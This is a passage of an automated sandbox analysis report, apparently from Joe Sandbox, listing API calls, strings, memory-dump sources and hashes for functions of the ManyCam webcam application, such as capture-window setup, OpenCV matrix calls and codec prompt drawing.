                                                                                                                                            • capCreateCaptureWindowA.AVICAP32(My Own Capture Window,C0000000,00000000,00000000,00000140,000000F0,00000000,00000000,?,?,00000050,?,00000050,00000000), ref: 00B91537
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B9153F
                                                                                                                                            • SendMessageA.USER32(00000000,0000040A,?,00000000), ref: 00B9154E
                                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00B91555
                                                                                                                                            • memset.MSVCR80 ref: 00B91590
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B91599
                                                                                                                                            • SendMessageA.USER32(00000000,0000040E,00000004,?), ref: 00B915A8
                                                                                                                                            • MoveWindow.USER32(00000000,00000000,00000000,00000140,000000F0,00000001,?,?,?), ref: 00B915BB
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B915C2
                                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00B915D5
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B915D8
                                                                                                                                            • SendMessageA.USER32(00000000,00000405,00000000,00B91470), ref: 00B915EB
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B915EE
                                                                                                                                            • SendMessageA.USER32(00000000,00000441,00000060,?), ref: 00B91601
                                                                                                                                            • IsWindow.USER32 ref: 00B9160C
                                                                                                                                            • SendMessageA.USER32(00000000,00000440,00000060,?), ref: 00B9161F
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B91622
                                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00B91632
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00B91635
                                                                                                                                            • SendMessageA.USER32(00000000,00000434,00000001,00000000), ref: 00B91645
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageSend$CaptureCreateDescriptionDestroyDriverMovememset
                                                                                                                                            • String ID: My Own Capture Window
                                                                                                                                            • API String ID: 3791414574-3038378883
                                                                                                                                            • Opcode ID: 55f2f722ea0dc361d8fcfccc1fae8f2c3d5fcd9dfd1379d76276762de9ab9471
                                                                                                                                            • Instruction ID: 0b0abd0cbf95fb945603a6808409046b019c5c27df95758b22f953f6e744bb5e
                                                                                                                                            • Opcode Fuzzy Hash: 55f2f722ea0dc361d8fcfccc1fae8f2c3d5fcd9dfd1379d76276762de9ab9471
                                                                                                                                            • Instruction Fuzzy Hash: 4041E9307817137BF6209B298C42FAF76DCEF86B40F010465F345AA1C0EBB4E901866E
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$Rect$BrushCreateDeleteObjectSolidText$Fill$DrawFocusFrameModewcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2925841201-0
                                                                                                                                            • Opcode ID: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
                                                                                                                                            • Instruction ID: 66e9c8a567400198a530f2ea5b8cee96818a293c6e558f9a1399f5342b62ddb8
                                                                                                                                            • Opcode Fuzzy Hash: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
                                                                                                                                            • Instruction Fuzzy Hash: 36A1BAB5A00208DFDB08CFD8D9989AEBBB5FF9C310F108119EA19AB355D734A945DF90
                                                                                                                                            APIs
                                                                                                                                            • cvInitSystem.HIGHGUI099(00000000,00000000), ref: 00B968EC
                                                                                                                                              • Part of subcall function 00B96810: LoadIconA.USER32 ref: 00B9685D
                                                                                                                                              • Part of subcall function 00B96810: LoadCursorA.USER32(00000000,00007F03), ref: 00B9686D
                                                                                                                                              • Part of subcall function 00B96810: GetStockObject.GDI32(00000002), ref: 00B9687F
                                                                                                                                              • Part of subcall function 00B96810: RegisterClassA.USER32(?), ref: 00B96890
                                                                                                                                              • Part of subcall function 00B96810: GetStockObject.GDI32(00000002), ref: 00B968A1
                                                                                                                                              • Part of subcall function 00B96810: RegisterClassA.USER32(?), ref: 00B968B4
                                                                                                                                            • cvError.CXCORE099(000000E5,cvNamedWindow,NULL name string,.\window_w32.cpp,00000173), ref: 00B96912
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassLoadObjectRegisterStock$CursorErrorIconInitSystem
                                                                                                                                            • String ID: .\window_w32.cpp$Frame window can not be created$HighGUI class$Inner function failed.$Main HighGUI class$NULL name string$cvNamedWindow
                                                                                                                                            • API String ID: 574138462-2062437467
                                                                                                                                            • Opcode ID: 2c695fd037a8fff041b61a8356e13d7a6ef6778d2bdd1f40fa606d61e0bb7043
                                                                                                                                            • Instruction ID: 5c2a826da5cd9efc62a58a9dcd17515045349358f545227455a6d95d2ea02c17
                                                                                                                                            • Opcode Fuzzy Hash: 2c695fd037a8fff041b61a8356e13d7a6ef6778d2bdd1f40fa606d61e0bb7043
                                                                                                                                            • Instruction Fuzzy Hash: 0B51D6B17443117BDB109F6A9C85F56BBD8EB88B21F1442BBF508A72D1E7B0E8108BD4
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041EAEF
                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 0041EB03
                                                                                                                                            • LoadIconW.USER32(00000000,00000087), ref: 0041EB51
                                                                                                                                            • DrawIconEx.USER32(00000000,0000000A,0000000A,?,00000020,00000020,00000000,00000000,00000003), ref: 0041EB75
                                                                                                                                            • DeleteObject.GDI32(?), ref: 0041EB7F
                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041EBB2
                                                                                                                                            • GetTextColor.GDI32(00000000), ref: 0041EBC1
                                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041EBD2
                                                                                                                                            • memset.MSVCR80 ref: 0041EC7C
                                                                                                                                              • Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041ECBC
                                                                                                                                            • memset.MSVCR80 ref: 0041ECE8
                                                                                                                                            • memset.MSVCR80 ref: 0041ED12
                                                                                                                                            • memset.MSVCR80 ref: 0041ED3C
                                                                                                                                            • wcslen.MSVCR80 ref: 0041EDE0
                                                                                                                                            • DrawTextW.USER32(00000000,?,00000000), ref: 0041EE04
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041EE1C
                                                                                                                                            Strings
                                                                                                                                            • Verdana, xrefs: 0041EC42
                                                                                                                                            • Please confirm that ManyCam has permission to add this codec to your computer., xrefs: 0041ECF5
                                                                                                                                            • To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer., xrefs: 0041ECCD
                                                                                                                                            • For more information please visit , xrefs: 0041ED1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$ColorObjectText$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
                                                                                                                                            • String ID: For more information please visit $Please confirm that ManyCam has permission to add this codec to your computer.$To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer.$Verdana
                                                                                                                                            • API String ID: 744489110-1759026381
                                                                                                                                            • Opcode ID: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
                                                                                                                                            • Instruction ID: 8647ecc2d404d113b85be19741f6e1cb79f34e612718a269b33a6944d2f87c5b
                                                                                                                                            • Opcode Fuzzy Hash: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
                                                                                                                                            • Instruction Fuzzy Hash: 00C147B0D00219DBDB14CF94DC94BEEBBB9BF54304F1081AAE509AB381DB746A89CF54
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000FB,cvCylDrawCylinder,Invalid parameter.,.\src\cylaux.cpp,0000009A), ref: 00402670
                                                                                                                                              • Part of subcall function 00405340: cvSet.CXCORE099(?,?,?,?,00000000,0040217B), ref: 0040535D
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 004021A7
                                                                                                                                            • _CIcos.MSVCR80 ref: 004021DD
                                                                                                                                            • _CIsin.MSVCR80 ref: 004021EA
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 0040225F
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 004022C4
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 00402325
                                                                                                                                            • _CIsqrt.MSVCR80 ref: 004023DC
                                                                                                                                            • _CIsqrt.MSVCR80 ref: 004023F7
                                                                                                                                            • _CIacos.MSVCR80 ref: 00402431
                                                                                                                                            • cvSet2D.CXCORE099(?,?,?), ref: 00402488
                                                                                                                                            • _CIcos.MSVCR80 ref: 004024E9
                                                                                                                                            • _CIsin.MSVCR80 ref: 00402517
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 00402559
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 004025DA
                                                                                                                                            • cvLine.CXCORE099(?,?,?,?,?), ref: 0040264C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IcosIsinIsqrt$ErrorIacosLineSet2
                                                                                                                                            • String ID: .\src\cylaux.cpp$Invalid parameter.$cvCylDrawCylinder
                                                                                                                                            • API String ID: 3689646513-1738803442
                                                                                                                                            • Opcode ID: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
                                                                                                                                            • Instruction ID: ee0604925432baceefbd38c3e5584ac40f80a2529fa49fd9d4d055b72c52293a
                                                                                                                                            • Opcode Fuzzy Hash: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
                                                                                                                                            • Instruction Fuzzy Hash: C8F1A171A05601DBD304AF60D989696BFF0FF84780F614D88E5D4672A9EB3198B4CFC6
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041F03F
                                                                                                                                            • FillRect.USER32(00000000,000000FF,00000000), ref: 0041F053
                                                                                                                                            • LoadIconW.USER32(00000000,00000087), ref: 0041F0A1
                                                                                                                                            • DrawIconEx.USER32(00000000,0000000A,0000000A,00529873,0000000A,0000000A,00000000,00000000,00000003), ref: 0041F0D3
                                                                                                                                            • DeleteObject.GDI32(00529873), ref: 0041F0DD
                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041F110
                                                                                                                                            • GetTextColor.GDI32(00000000), ref: 0041F11F
                                                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041F130
                                                                                                                                            • memset.MSVCR80 ref: 0041F1DA
                                                                                                                                              • Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041F21A
                                                                                                                                            • memset.MSVCR80 ref: 0041F293
                                                                                                                                            • memset.MSVCR80 ref: 0041F2BA
                                                                                                                                            • wcslen.MSVCR80 ref: 0041F35E
                                                                                                                                            • DrawTextW.USER32(00000000,?,00000000), ref: 0041F385
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041F39D
                                                                                                                                            Strings
                                                                                                                                            • Verdana, xrefs: 0041F1A0
                                                                                                                                            • visit the ManyCam website help page , xrefs: 0041F2A0
                                                                                                                                            • this codec doesn, xrefs: 0041F27B
                                                                                                                                            • This feature requires a special video codec to function properly. Unfortunately, xrefs: 0041F22B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ColorObjectTextmemset$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
                                                                                                                                            • String ID: This feature requires a special video codec to function properly. Unfortunately$Verdana$this codec doesn$visit the ManyCam website help page
                                                                                                                                            • API String ID: 923866622-1098169901
                                                                                                                                            • Opcode ID: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
                                                                                                                                            • Instruction ID: 6f95be4a3cc1c25362b5af6b12462e5a34df96a0e09e544e1f1783aa57f49324
                                                                                                                                            • Opcode Fuzzy Hash: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
                                                                                                                                            • Instruction Fuzzy Hash: 83D1F7B0D002189FDB14DF99DC54BDEBBB8BF58304F1081AAE509AB391DB746A89CF54
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
                                                                                                                                              • Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5
                                                                                                                                            • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C878C
                                                                                                                                            • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C879B
                                                                                                                                            • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87D2
                                                                                                                                            • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87E1
                                                                                                                                              • Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F
                                                                                                                                            Strings
                                                                                                                                            • CManyCamModel::UpdateGraphTopologyOnSourceChange, xrefs: 004C8755
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancellation_token_source::~cancellation_token_source$clock$AllocatorDebugHeap
                                                                                                                                            • String ID: CManyCamModel::UpdateGraphTopologyOnSourceChange
                                                                                                                                            • API String ID: 952932671-1321120180
                                                                                                                                            • Opcode ID: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
                                                                                                                                            • Instruction ID: 10940e179f8bca40d99c735d3df1e6ff842ee16e2e5db1de052c77a05b9f2183
                                                                                                                                            • Opcode Fuzzy Hash: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
                                                                                                                                            • Instruction Fuzzy Hash: 5BE13E70D04248DECB04EFA5D961BEEBBB0AF15308F10815FF4166B282EF785A45DB99
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004B76D0: fwprintf.MSVCR80 ref: 004B7764
                                                                                                                                              • Part of subcall function 004B76D0: fflush.MSVCR80 ref: 004B7774
                                                                                                                                            • StringFromGUID2.OLE32()K,?,00000040,)K,0056F910,)K,00574DDC), ref: 004B2C30
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromStringfflushfwprintf
                                                                                                                                            • String ID: Bit count = %d$Format type = %s$Format type = FORMAT_VideoInfo$Format type = GUID_NULL$Frame size = %dx%d$Major type = %s$Major type = GUID_NULL$Major type = MEDIATYPE_Video$Mediatype info:$Subtype = %s$Subtype = GUID_NULL$Subtype = MEDIASUBTYPE_RGB24$Subtype = MEDIASUBTYPE_RGB32$vids$)K
                                                                                                                                            • API String ID: 2684700382-3987823964
                                                                                                                                            • Opcode ID: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
                                                                                                                                            • Instruction ID: 0a30e523ff0296b33be7bff9fb0a9039800934aade4f4bd872009a2dad4e24fd
                                                                                                                                            • Opcode Fuzzy Hash: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
                                                                                                                                            • Instruction Fuzzy Hash: A951C870E5420867DB10AF19DC57EDE3B34BF44705F00841AB908A6283EFB4EA59D7BA
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83
                                                                                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 00B960B6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$LongProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2275667008-0
                                                                                                                                            • Opcode ID: 44f14b74e0578ae6fe68c301a41bae6ff7f960ce3d9901b2b80d022c868bad66
                                                                                                                                            • Instruction ID: db2e0c6da9f3953046750d2bfd243113ad3efe1afa1f74bc6c692cb5e801f837
                                                                                                                                            • Opcode Fuzzy Hash: 44f14b74e0578ae6fe68c301a41bae6ff7f960ce3d9901b2b80d022c868bad66
                                                                                                                                            • Instruction Fuzzy Hash: 29716CB5204201AFD714DB64DD84E6BFBE8FB88714F004A1DF98593250DB75ED05CBA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,0040120F), ref: 00403198
                                                                                                                                              • Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,00000000,?,0040120F), ref: 004031AF
                                                                                                                                              • Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,?,?,?,?,00000000,?,0040120F), ref: 004031C7
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005,0040120F), ref: 00402C98
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,0040120F), ref: 00402CB4
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,0040120F), ref: 00402CD0
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402CEC
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402D08
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D24
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D40
                                                                                                                                            • cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D5C
                                                                                                                                            • cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D78
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402D94
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DB0
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DCC
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DE8
                                                                                                                                            • cvCreateMat.CXCORE099(00000003,00000001,00000005), ref: 00402E04
                                                                                                                                            • cvCreateMat.CXCORE099(00000006,00000006,00000005), ref: 00402E20
                                                                                                                                            • cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E38
                                                                                                                                            • cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E50
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402E68
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E80
                                                                                                                                            • cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E98
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
